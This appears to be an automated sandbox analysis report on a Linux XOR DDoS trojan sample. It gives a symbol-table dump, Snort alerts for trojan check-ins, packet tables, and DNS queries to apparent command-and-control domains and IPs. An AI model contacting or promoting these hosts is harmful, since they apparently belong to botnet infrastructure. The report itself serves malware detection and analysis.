                                                                                                                                                __getrlimit.symtab0x806903054FUNC<unknown>DEFAULT3
                                                                                                                                                __getsockname.symtab0x806ae0030FUNC<unknown>DEFAULT3
                                                                                                                                                __getsockopt.symtab0x806ae2030FUNC<unknown>DEFAULT3
                                                                                                                                                __gettext_extract_plural.symtab0x8078660266FUNC<unknown>DEFAULT3
                                                                                                                                                __gettext_free_exp.symtab0x8077ad0523FUNC<unknown>DEFAULT3
                                                                                                                                                __gettext_germanic_plural.symtab0x80c224820OBJECT<unknown>DEFAULT7
                                                                                                                                                __gettextparse.symtab0x8077dd02186FUNC<unknown>DEFAULT3
                                                                                                                                                __gettimeofday.symtab0x806719031FUNC<unknown>DEFAULT3
                                                                                                                                                __gettimeofday_internal.symtab0x806719031FUNC<unknown>DEFAULT3
                                                                                                                                                __getuid.symtab0x808b53012FUNC<unknown>DEFAULT3
                                                                                                                                                __gmon_start__.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                                                                                                                __guess_grouping.symtab0x807f2a076FUNC<unknown>DEFAULT3
                                                                                                                                                __hash_string.symtab0x807877059FUNC<unknown>DEFAULT3
                                                                                                                                                __i686.get_pc_thunk.bx.symtab0x80af81d0FUNC<unknown>HIDDEN3
                                                                                                                                                __i686.get_pc_thunk.cx.symtab0x80af8190FUNC<unknown>HIDDEN3
                                                                                                                                                __inet_aton.symtab0x806b260343FUNC<unknown>DEFAULT3
                                                                                                                                                __init_array_end.symtab0x80cf1200NOTYPE<unknown>HIDDEN14
                                                                                                                                                __init_array_start.symtab0x80cf1200NOTYPE<unknown>HIDDEN14
                                                                                                                                                __init_misc.symtab0x806ac6078FUNC<unknown>DEFAULT3
                                                                                                                                                __init_sched_fifo_prio.symtab0x8053f8042FUNC<unknown>DEFAULT3
                                                                                                                                                __initstate.symtab0x8056370112FUNC<unknown>DEFAULT3
                                                                                                                                                __initstate_r.symtab0x8056780545FUNC<unknown>DEFAULT3
                                                                                                                                                __ioctl.symtab0x80690f033FUNC<unknown>DEFAULT3
                                                                                                                                                __is_smp.symtab0x80d61904OBJECT<unknown>DEFAULT22
                                                                                                                                                __isatty.symtab0x808b6e034FUNC<unknown>DEFAULT3
                                                                                                                                                __isinf.symtab0x80964d064FUNC<unknown>DEFAULT3
                                                                                                                                                __isinfl.symtab0x809654085FUNC<unknown>DEFAULT3
                                                                                                                                                __isnan.symtab0x809651039FUNC<unknown>DEFAULT3
                                                                                                                                                __isnanl.symtab0x80965a069FUNC<unknown>DEFAULT3
                                                                                                                                                __kill.symtab0x805556031FUNC<unknown>DEFAULT3
                                                                                                                                                __lchown.symtab0x8068d8057FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_alloca_cutoff.symtab0x806b01066FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_argc.symtab0x80d63084OBJECT<unknown>DEFAULT22
                                                                                                                                                __libc_argv.symtab0x80d630c4OBJECT<unknown>DEFAULT22
                                                                                                                                                __libc_calloc.symtab0x80639e0842FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_check_standard_fds.symtab0x8054cd0459FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_cleanup_routine.symtab0x806b06027FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_close.symtab0x8053ad080FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_connect.symtab0x8053c3087FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_csu_fini.symtab0x805512057FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_csu_init.symtab0x8055160127FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_disable_asynccancel.symtab0x806b08050FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_dlclose.symtab0x80945c087FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_dlopen_mode.symtab0x8094700226FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_dlsym.symtab0x8094620108FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_dlsym_private.symtab0x8094690108FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_enable_asynccancel.symtab0x806b0c098FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_enable_secure.symtab0x80cf1404OBJECT<unknown>DEFAULT18
                                                                                                                                                __libc_enable_secure_decided.symtab0x80d63044OBJECT<unknown>DEFAULT22
                                                                                                                                                __libc_errno.symtab0x144TLS<unknown>DEFAULT14
                                                                                                                                                __libc_fatal.symtab0x8059d9042FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_fcntl.symtab0x8053b70177FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_fork.symtab0x8067810535FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_free.symtab0x8065320410FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_init_first.symtab0x806cba0133FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_init_secure.symtab0x806cb4066FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_longjmp.symtab0x805535084FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_lseek.symtab0x8053d5033FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_lseek64.symtab0x806ad50117FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_mallinfo.symtab0x8060a60353FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_malloc.symtab0x8063d30442FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_malloc_initialized.symtab0x80cf9f84OBJECT<unknown>DEFAULT21
                                                                                                                                                __libc_mallopt.symtab0x8061150356FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_memalign.symtab0x8063ef0467FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_message.symtab0x8059ad0691FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_multiple_libcs.symtab0x80cfa4c4OBJECT<unknown>DEFAULT21
                                                                                                                                                __libc_nanosleep.symtab0x80677b087FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_open.symtab0x8053d8091FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_pause.symtab0x8053de064FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_pthread_init.symtab0x806b23045FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_pvalloc.symtab0x80630c0469FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_read.symtab0x8053a7091FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_realloc.symtab0x80654c01085FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_recvfrom.symtab0x8053c9087FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_register_dl_open_hook.symtab0x80947f0125FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_register_dlfcn_hook.symtab0x809e5b037FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_resp.symtab0x04TLS<unknown>DEFAULT13
                                                                                                                                                __libc_select.symtab0x8069170115FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_send.symtab0x806ae4087FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_sendto.symtab0x8053cf087FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_setlocale_lock.symtab0x80d58a032OBJECT<unknown>DEFAULT22
                                                                                                                                                __libc_setup_tls.symtab0x8054f00505FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_sigaction.symtab0x8054730298FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_siglongjmp.symtab0x805535084FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_stack_end.symtab0x80cf13c4OBJECT<unknown>DEFAULT18
                                                                                                                                                __libc_start_main.symtab0x80549b0763FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_system.symtab0x8057a30104FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_thread_freeres.symtab0x80b298033FUNC<unknown>DEFAULT5
                                                                                                                                                __libc_tsd_CTYPE_B.symtab0x184TLS<unknown>DEFAULT14
                                                                                                                                                __libc_tsd_CTYPE_TOLOWER.symtab0x204TLS<unknown>DEFAULT14
                                                                                                                                                __libc_tsd_CTYPE_TOUPPER.symtab0x1c4TLS<unknown>DEFAULT14
                                                                                                                                                __libc_tsd_LOCALE.symtab0x84TLS<unknown>DEFAULT13
                                                                                                                                                __libc_tsd_MALLOC.symtab0x244TLS<unknown>DEFAULT14
                                                                                                                                                __libc_valloc.symtab0x80632a0467FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_waitpid.symtab0x8053e2091FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_write.symtab0x8053a1091FUNC<unknown>DEFAULT3
                                                                                                                                                __libc_writev.symtab0x808b980270FUNC<unknown>DEFAULT3
                                                                                                                                                __libio_codecvt.symtab0x80c2e00120OBJECT<unknown>DEFAULT7
                                                                                                                                                __libio_translit.symtab0x80c2e7820OBJECT<unknown>DEFAULT7
                                                                                                                                                __lll_lock_wait.symtab0x805373048FUNC<unknown>HIDDEN3
                                                                                                                                                __lll_lock_wait_private.symtab0x805370042FUNC<unknown>HIDDEN3
                                                                                                                                                __lll_robust_lock_wait.symtab0x80538e081FUNC<unknown>HIDDEN3
                                                                                                                                                __lll_robust_timedlock_wait.symtab0x8053940201FUNC<unknown>HIDDEN3
                                                                                                                                                __lll_timedlock_wait.symtab0x8053760173FUNC<unknown>HIDDEN3
                                                                                                                                                __lll_timedwait_tid.symtab0x8053870112FUNC<unknown>HIDDEN3
                                                                                                                                                __lll_unlock_wake.symtab0x805384043FUNC<unknown>HIDDEN3
                                                                                                                                                __lll_unlock_wake_private.symtab0x805381037FUNC<unknown>HIDDEN3
                                                                                                                                                __llseek.symtab0x806ad50117FUNC<unknown>DEFAULT3
                                                                                                                                                __localtime_r.symtab0x8086e0034FUNC<unknown>DEFAULT3
                                                                                                                                                __longjmp.symtab0x80553b043FUNC<unknown>DEFAULT3
                                                                                                                                                __lseek.symtab0x8053d5033FUNC<unknown>DEFAULT3
                                                                                                                                                __lseek64.symtab0x806ad50117FUNC<unknown>DEFAULT3
                                                                                                                                                __make_stacks_executable.symtab0x8051210257FUNC<unknown>DEFAULT3
                                                                                                                                                __mallinfo.symtab0x8060a60353FUNC<unknown>DEFAULT3
                                                                                                                                                __malloc.symtab0x8063d30442FUNC<unknown>DEFAULT3
                                                                                                                                                __malloc_check_init.symtab0x8060000121FUNC<unknown>DEFAULT3
                                                                                                                                                __malloc_get_state.symtab0x8064180428FUNC<unknown>DEFAULT3
                                                                                                                                                __malloc_hook.symtab0x80cf9ec4OBJECT<unknown>DEFAULT21
                                                                                                                                                __malloc_initialize_hook.symtab0x80d4b404OBJECT<unknown>DEFAULT22
                                                                                                                                                __malloc_set_state.symtab0x8060dc0905FUNC<unknown>DEFAULT3
                                                                                                                                                __malloc_stats.symtab0x8060840529FUNC<unknown>DEFAULT3
                                                                                                                                                __malloc_trim.symtab0x8060bd0493FUNC<unknown>DEFAULT3
                                                                                                                                                __malloc_usable_size.symtab0x805f01052FUNC<unknown>DEFAULT3
                                                                                                                                                __mallopt.symtab0x8061150356FUNC<unknown>DEFAULT3
                                                                                                                                                __mbrlen.symtab0x808650055FUNC<unknown>DEFAULT3
                                                                                                                                                __mbrtowc.symtab0x8086540407FUNC<unknown>DEFAULT3
                                                                                                                                                __mbsnrtowcs.symtab0x8086ae0594FUNC<unknown>DEFAULT3
                                                                                                                                                __memalign.symtab0x8063ef0467FUNC<unknown>DEFAULT3
                                                                                                                                                __memalign_hook.symtab0x80cf9f44OBJECT<unknown>DEFAULT21
                                                                                                                                                __memchr.symtab0x8066760411FUNC<unknown>DEFAULT3
                                                                                                                                                __mempcpy.symtab0x8066a2068FUNC<unknown>DEFAULT3
                                                                                                                                                __mkdir.symtab0x8068d6031FUNC<unknown>DEFAULT3
                                                                                                                                                __mktime_internal.symtab0x809f3002437FUNC<unknown>DEFAULT3
                                                                                                                                                __mmap.symtab0x8069da067FUNC<unknown>DEFAULT3
                                                                                                                                                __mmap64.symtab0x8069df088FUNC<unknown>DEFAULT3
                                                                                                                                                __mon_yday.symtab0x80c72c052OBJECT<unknown>DEFAULT7
                                                                                                                                                __morecore.symtab0x80cf9e84OBJECT<unknown>DEFAULT21
                                                                                                                                                __mpn_add_n.symtab0x80aa690144FUNC<unknown>DEFAULT3
                                                                                                                                                __mpn_addmul_1.symtab0x80aa72060FUNC<unknown>DEFAULT3
                                                                                                                                                __mpn_cmp.symtab0x8096b6092FUNC<unknown>DEFAULT3
                                                                                                                                                __mpn_construct_double.symtab0x80aa7a086FUNC<unknown>DEFAULT3
                                                                                                                                                __mpn_construct_float.symtab0x80aa76049FUNC<unknown>DEFAULT3
                                                                                                                                                __mpn_construct_long_double.symtab0x80aa80071FUNC<unknown>DEFAULT3
                                                                                                                                                __mpn_divrem.symtab0x8096bc01112FUNC<unknown>DEFAULT3
                                                                                                                                                __mpn_extract_double.symtab0x80988b0244FUNC<unknown>DEFAULT3
                                                                                                                                                __mpn_extract_long_double.symtab0x80989b0279FUNC<unknown>DEFAULT3
                                                                                                                                                __mpn_impn_mul_n.symtab0x80976701989FUNC<unknown>DEFAULT3
                                                                                                                                                __mpn_impn_mul_n_basecase.symtab0x8097570247FUNC<unknown>DEFAULT3
                                                                                                                                                __mpn_impn_sqr_n.symtab0x8097e401829FUNC<unknown>DEFAULT3
                                                                                                                                                __mpn_impn_sqr_n_basecase.symtab0x8097470250FUNC<unknown>DEFAULT3
                                                                                                                                                __mpn_lshift.symtab0x809702087FUNC<unknown>DEFAULT3
                                                                                                                                                __mpn_mul.symtab0x80970e0843FUNC<unknown>DEFAULT3
                                                                                                                                                __mpn_mul_1.symtab0x809743057FUNC<unknown>DEFAULT3
                                                                                                                                                __mpn_mul_n.symtab0x8098570620FUNC<unknown>DEFAULT3
                                                                                                                                                __mpn_rshift.symtab0x809708087FUNC<unknown>DEFAULT3
                                                                                                                                                __mpn_sub_n.symtab0x80987e0144FUNC<unknown>DEFAULT3
                                                                                                                                                __mpn_submul_1.symtab0x809887060FUNC<unknown>DEFAULT3
                                                                                                                                                __mprotect.symtab0x8069e7033FUNC<unknown>DEFAULT3
                                                                                                                                                __mremap.symtab0x806add045FUNC<unknown>DEFAULT3
                                                                                                                                                __munmap.symtab0x8069e5031FUNC<unknown>DEFAULT3
                                                                                                                                                __nanosleep.symtab0x80677b087FUNC<unknown>DEFAULT3
                                                                                                                                                __nanosleep_nocancel.symtab0x80677ba31FUNC<unknown>DEFAULT3
                                                                                                                                                __new_exitfn.symtab0x8056000274FUNC<unknown>DEFAULT3
                                                                                                                                                __new_exitfn_called.symtab0x80d62408OBJECT<unknown>DEFAULT22
                                                                                                                                                __new_fclose.symtab0x8057df0439FUNC<unknown>DEFAULT3
                                                                                                                                                __new_fopen.symtab0x80582a034FUNC<unknown>DEFAULT3
                                                                                                                                                __new_getrlimit.symtab0x806903054FUNC<unknown>DEFAULT3
                                                                                                                                                __new_sem_init.symtab0x805332084FUNC<unknown>DEFAULT3
                                                                                                                                                __new_sem_post.symtab0x805342078FUNC<unknown>DEFAULT3
                                                                                                                                                __new_sem_wait.symtab0x8053380141FUNC<unknown>DEFAULT3
                                                                                                                                                __nptl_create_event.symtab0x80547005FUNC<unknown>DEFAULT3
                                                                                                                                                __nptl_deallocate_tsd.symtab0x8050980278FUNC<unknown>DEFAULT3
                                                                                                                                                __nptl_death_event.symtab0x80547105FUNC<unknown>DEFAULT3
                                                                                                                                                __nptl_initial_report_events.symtab0x80d20cc1OBJECT<unknown>DEFAULT22
                                                                                                                                                __nptl_last_event.symtab0x80d20c04OBJECT<unknown>DEFAULT22
                                                                                                                                                __nptl_nthreads.symtab0x80cf4f04OBJECT<unknown>DEFAULT21
                                                                                                                                                __nptl_setxid.symtab0x8050e60941FUNC<unknown>DEFAULT3
                                                                                                                                                __nptl_threads_events.symtab0x80d20b88OBJECT<unknown>DEFAULT22
                                                                                                                                                __offtime.symtab0x809f010746FUNC<unknown>DEFAULT3
                                                                                                                                                __open.symtab0x8053d8091FUNC<unknown>DEFAULT3
                                                                                                                                                __open_nocancel.symtab0x8053d8a33FUNC<unknown>DEFAULT3
                                                                                                                                                __opendir.symtab0x80672a0220FUNC<unknown>DEFAULT3
                                                                                                                                                __overflow.symtab0x805d81041FUNC<unknown>DEFAULT3
                                                                                                                                                __parse_one_specmb.symtab0x80834801320FUNC<unknown>DEFAULT3
                                                                                                                                                __pause_nocancel.symtab0x8053dea19FUNC<unknown>DEFAULT3
                                                                                                                                                __posix_memalign.symtab0x80640d0111FUNC<unknown>DEFAULT3
                                                                                                                                                __preinit_array_end.symtab0x80cf1200NOTYPE<unknown>HIDDEN14
                                                                                                                                                __preinit_array_start.symtab0x80cf1200NOTYPE<unknown>HIDDEN14
                                                                                                                                                __printf_arginfo_table.symtab0x80d63e04OBJECT<unknown>DEFAULT23
                                                                                                                                                __printf_fp.symtab0x807f6209363FUNC<unknown>DEFAULT3
                                                                                                                                                __printf_fphex.symtab0x8081b506104FUNC<unknown>DEFAULT3

                                                                                                                                                Network Behavior

                                                                                                                                                Snort IDS Alerts

                                                                                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                03/14/22-21:21:23.655167TCP2021336ET TROJAN DDoS.XOR Checkin via HTTP5765280192.168.2.2354.36.15.99
                                                                                                                                                03/14/22-21:21:49.213440TCP2020381ET TROJAN DDoS.XOR Checkin4596853192.168.2.2354.36.15.99

                                                                                                                                                Network Port Distribution

                                                                                                                                                TCP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Mar 14, 2022 21:21:23.622404099 CET5765280192.168.2.2354.36.15.99
                                                                                                                                                Mar 14, 2022 21:21:23.630692005 CET3864853192.168.2.2351.89.52.12
                                                                                                                                                Mar 14, 2022 21:21:23.648276091 CET533864851.89.52.12192.168.2.23
                                                                                                                                                Mar 14, 2022 21:21:23.649422884 CET805765254.36.15.99192.168.2.23
                                                                                                                                                Mar 14, 2022 21:21:23.649502993 CET5765280192.168.2.2354.36.15.99
                                                                                                                                                Mar 14, 2022 21:21:23.655167103 CET5765280192.168.2.2354.36.15.99
                                                                                                                                                Mar 14, 2022 21:21:23.682240963 CET805765254.36.15.99192.168.2.23
                                                                                                                                                Mar 14, 2022 21:21:23.685058117 CET5765280192.168.2.2354.36.15.99
                                                                                                                                                Mar 14, 2022 21:21:23.685209990 CET5765280192.168.2.2354.36.15.99
                                                                                                                                                Mar 14, 2022 21:21:23.704276085 CET3325253192.168.2.2379.137.1.132
                                                                                                                                                Mar 14, 2022 21:21:23.712024927 CET805765254.36.15.99192.168.2.23
                                                                                                                                                Mar 14, 2022 21:21:24.497015953 CET42836443192.168.2.2391.189.91.43
                                                                                                                                                Mar 14, 2022 21:21:24.721009016 CET3325253192.168.2.2379.137.1.132
                                                                                                                                                Mar 14, 2022 21:21:25.008999109 CET4251680192.168.2.23109.202.202.202
                                                                                                                                                Mar 14, 2022 21:21:26.740488052 CET3325253192.168.2.2379.137.1.132
                                                                                                                                                Mar 14, 2022 21:21:28.727725983 CET4192653192.168.2.2354.36.145.106
                                                                                                                                                Mar 14, 2022 21:21:29.744688034 CET4192653192.168.2.2354.36.145.106
                                                                                                                                                Mar 14, 2022 21:21:31.760557890 CET4192653192.168.2.2354.36.145.106
                                                                                                                                                Mar 14, 2022 21:21:33.751405001 CET3865653192.168.2.2351.89.52.12
                                                                                                                                                Mar 14, 2022 21:21:33.769083023 CET533865651.89.52.12192.168.2.23
                                                                                                                                                Mar 14, 2022 21:21:33.826284885 CET4664653192.168.2.2346.105.84.190
                                                                                                                                                Mar 14, 2022 21:21:34.832458973 CET4664653192.168.2.2346.105.84.190
                                                                                                                                                Mar 14, 2022 21:21:36.848268032 CET4664653192.168.2.2346.105.84.190
                                                                                                                                                Mar 14, 2022 21:21:38.848695040 CET5316853192.168.2.23176.31.91.137
                                                                                                                                                Mar 14, 2022 21:21:39.344187021 CET43928443192.168.2.2391.189.91.42
                                                                                                                                                Mar 14, 2022 21:21:39.856102943 CET5316853192.168.2.23176.31.91.137
                                                                                                                                                Mar 14, 2022 21:21:41.871975899 CET5316853192.168.2.23176.31.91.137
                                                                                                                                                Mar 14, 2022 21:21:43.871958017 CET3866453192.168.2.2351.89.52.12
                                                                                                                                                Mar 14, 2022 21:21:43.890574932 CET533866451.89.52.12192.168.2.23
                                                                                                                                                Mar 14, 2022 21:21:43.944986105 CET3326853192.168.2.2379.137.1.132
                                                                                                                                                Mar 14, 2022 21:21:44.975863934 CET3326853192.168.2.2379.137.1.132
                                                                                                                                                Mar 14, 2022 21:21:46.991651058 CET3326853192.168.2.2379.137.1.132
                                                                                                                                                Mar 14, 2022 21:21:48.968547106 CET4596853192.168.2.2354.36.15.99
                                                                                                                                                Mar 14, 2022 21:21:48.995480061 CET534596854.36.15.99192.168.2.23
                                                                                                                                                Mar 14, 2022 21:21:48.995608091 CET4596853192.168.2.2354.36.15.99
                                                                                                                                                Mar 14, 2022 21:21:49.139600039 CET4596853192.168.2.2354.36.15.99
                                                                                                                                                Mar 14, 2022 21:21:49.213330984 CET534596854.36.15.99192.168.2.23
                                                                                                                                                Mar 14, 2022 21:21:49.213439941 CET4596853192.168.2.2354.36.15.99
                                                                                                                                                Mar 14, 2022 21:21:49.241010904 CET534596854.36.15.99192.168.2.23
                                                                                                                                                Mar 14, 2022 21:21:49.241142988 CET4596853192.168.2.2354.36.15.99
                                                                                                                                                Mar 14, 2022 21:21:51.631386042 CET42836443192.168.2.2391.189.91.43
                                                                                                                                                Mar 14, 2022 21:21:53.386679888 CET534596854.36.15.99192.168.2.23
                                                                                                                                                Mar 14, 2022 21:21:53.386805058 CET4596853192.168.2.2354.36.15.99
                                                                                                                                                Mar 14, 2022 21:21:55.727094889 CET4251680192.168.2.23109.202.202.202
                                                                                                                                                Mar 14, 2022 21:22:03.418034077 CET534596854.36.15.99192.168.2.23
                                                                                                                                                Mar 14, 2022 21:22:03.418122053 CET4596853192.168.2.2354.36.15.99
                                                                                                                                                Mar 14, 2022 21:22:13.450350046 CET534596854.36.15.99192.168.2.23
                                                                                                                                                Mar 14, 2022 21:22:13.450496912 CET4596853192.168.2.2354.36.15.99
                                                                                                                                                Mar 14, 2022 21:22:20.301644087 CET43928443192.168.2.2391.189.91.42
                                                                                                                                                Mar 14, 2022 21:22:23.482651949 CET534596854.36.15.99192.168.2.23
                                                                                                                                                Mar 14, 2022 21:22:23.482786894 CET4596853192.168.2.2354.36.15.99
                                                                                                                                                Mar 14, 2022 21:22:28.437282085 CET534596854.36.15.99192.168.2.23
                                                                                                                                                Mar 14, 2022 21:22:28.437457085 CET4596853192.168.2.2354.36.15.99
                                                                                                                                                Mar 14, 2022 21:22:38.468614101 CET534596854.36.15.99192.168.2.23
                                                                                                                                                Mar 14, 2022 21:22:38.468842983 CET4596853192.168.2.2354.36.15.99
                                                                                                                                                Mar 14, 2022 21:22:48.500973940 CET534596854.36.15.99192.168.2.23
                                                                                                                                                Mar 14, 2022 21:22:48.501106024 CET4596853192.168.2.2354.36.15.99
                                                                                                                                                Mar 14, 2022 21:22:58.533281088 CET534596854.36.15.99192.168.2.23
                                                                                                                                                Mar 14, 2022 21:22:58.533417940 CET4596853192.168.2.2354.36.15.99
                                                                                                                                                Mar 14, 2022 21:23:03.488044024 CET534596854.36.15.99192.168.2.23
                                                                                                                                                Mar 14, 2022 21:23:03.488234997 CET4596853192.168.2.2354.36.15.99
                                                                                                                                                Mar 14, 2022 21:23:13.519325972 CET534596854.36.15.99192.168.2.23
                                                                                                                                                Mar 14, 2022 21:23:13.519428015 CET4596853192.168.2.2354.36.15.99
                                                                                                                                                Mar 14, 2022 21:23:23.552159071 CET534596854.36.15.99192.168.2.23
                                                                                                                                                Mar 14, 2022 21:23:23.552258015 CET4596853192.168.2.2354.36.15.99

                                                                                                                                                UDP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Mar 14, 2022 21:21:23.603575945 CET5185553192.168.2.238.8.8.8
                                                                                                                                                Mar 14, 2022 21:21:23.613936901 CET3726753192.168.2.238.8.8.8
                                                                                                                                                Mar 14, 2022 21:21:23.622210026 CET53518558.8.8.8192.168.2.23
                                                                                                                                                Mar 14, 2022 21:21:23.630464077 CET53372678.8.8.8192.168.2.23
                                                                                                                                                Mar 14, 2022 21:21:23.648638010 CET4647953192.168.2.238.8.8.8
                                                                                                                                                Mar 14, 2022 21:21:23.667179108 CET53464798.8.8.8192.168.2.23
                                                                                                                                                Mar 14, 2022 21:21:23.669755936 CET4100453192.168.2.238.8.4.4
                                                                                                                                                Mar 14, 2022 21:21:23.685904980 CET53410048.8.4.4192.168.2.23
                                                                                                                                                Mar 14, 2022 21:21:23.686080933 CET5133653192.168.2.238.8.8.8
                                                                                                                                                Mar 14, 2022 21:21:23.704147100 CET53513368.8.8.8192.168.2.23
                                                                                                                                                Mar 14, 2022 21:21:28.709108114 CET5814753192.168.2.238.8.8.8
                                                                                                                                                Mar 14, 2022 21:21:28.727509975 CET53581478.8.8.8192.168.2.23
                                                                                                                                                Mar 14, 2022 21:21:33.732633114 CET5758053192.168.2.238.8.8.8
                                                                                                                                                Mar 14, 2022 21:21:33.751255989 CET53575808.8.8.8192.168.2.23
                                                                                                                                                Mar 14, 2022 21:21:33.769275904 CET4019153192.168.2.238.8.8.8
                                                                                                                                                Mar 14, 2022 21:21:33.788367033 CET53401918.8.8.8192.168.2.23
                                                                                                                                                Mar 14, 2022 21:21:33.788548946 CET3784653192.168.2.238.8.4.4
                                                                                                                                                Mar 14, 2022 21:21:33.807801008 CET53378468.8.4.4192.168.2.23
                                                                                                                                                Mar 14, 2022 21:21:33.808006048 CET4426453192.168.2.238.8.8.8
                                                                                                                                                Mar 14, 2022 21:21:33.826148987 CET53442648.8.8.8192.168.2.23
                                                                                                                                                Mar 14, 2022 21:21:38.831947088 CET4519953192.168.2.238.8.8.8
                                                                                                                                                Mar 14, 2022 21:21:38.848433971 CET53451998.8.8.8192.168.2.23
                                                                                                                                                Mar 14, 2022 21:21:43.853449106 CET4071653192.168.2.238.8.8.8
                                                                                                                                                Mar 14, 2022 21:21:43.871815920 CET53407168.8.8.8192.168.2.23
                                                                                                                                                Mar 14, 2022 21:21:43.890737057 CET3472953192.168.2.238.8.8.8
                                                                                                                                                Mar 14, 2022 21:21:43.909188032 CET53347298.8.8.8192.168.2.23
                                                                                                                                                Mar 14, 2022 21:21:43.909339905 CET3484153192.168.2.238.8.4.4
                                                                                                                                                Mar 14, 2022 21:21:43.926388979 CET53348418.8.4.4192.168.2.23
                                                                                                                                                Mar 14, 2022 21:21:43.926578999 CET3369953192.168.2.238.8.8.8
                                                                                                                                                Mar 14, 2022 21:21:43.944708109 CET53336998.8.8.8192.168.2.23
                                                                                                                                                Mar 14, 2022 21:21:48.949882984 CET5563553192.168.2.238.8.8.8
                                                                                                                                                Mar 14, 2022 21:21:48.968261957 CET53556358.8.8.8192.168.2.23

                                                                                                                                                DNS Queries

                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                Mar 14, 2022 21:21:23.603575945 CET192.168.2.238.8.8.80xeb81Standard query (0)www1.gggatat456.comA (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:23.613936901 CET192.168.2.238.8.8.80xe606Standard query (0)p5.lpjulidny7.comA (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:23.648638010 CET192.168.2.238.8.8.80x4e5bStandard query (0)p5.dddgata789.comA (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:23.669755936 CET192.168.2.238.8.4.40x797fStandard query (0)p5.dddgata789.comA (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:23.686080933 CET192.168.2.238.8.8.80x4e42Standard query (0)ppp.xxxatat456.comA (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:28.709108114 CET192.168.2.238.8.8.80x61b9Standard query (0)ppp.gggatat456.comA (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:33.732633114 CET192.168.2.238.8.8.80xcaa2Standard query (0)p5.lpjulidny7.comA (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:33.769275904 CET192.168.2.238.8.8.80x5786Standard query (0)p5.dddgata789.comA (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:33.788548946 CET192.168.2.238.8.4.40xc987Standard query (0)p5.dddgata789.comA (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:33.808006048 CET192.168.2.238.8.8.80xd172Standard query (0)ppp.xxxatat456.comA (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:38.831947088 CET192.168.2.238.8.8.80xcffcStandard query (0)ppp.gggatat456.comA (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:43.853449106 CET192.168.2.238.8.8.80xd52Standard query (0)p5.lpjulidny7.comA (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:43.890737057 CET192.168.2.238.8.8.80x3993Standard query (0)p5.dddgata789.comA (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:43.909339905 CET192.168.2.238.8.4.40x51e0Standard query (0)p5.dddgata789.comA (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:43.926578999 CET192.168.2.238.8.8.80x6b01Standard query (0)ppp.xxxatat456.comA (IP address)IN (0x0001)
                                                                                                                                                Mar 14, 2022 21:21:48.949882984 CET192.168.2.238.8.8.80x4c64Standard query (0)ppp.gggatat456.comA (IP address)IN (0x0001)

                                                                                                                                                DNS Answers

                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
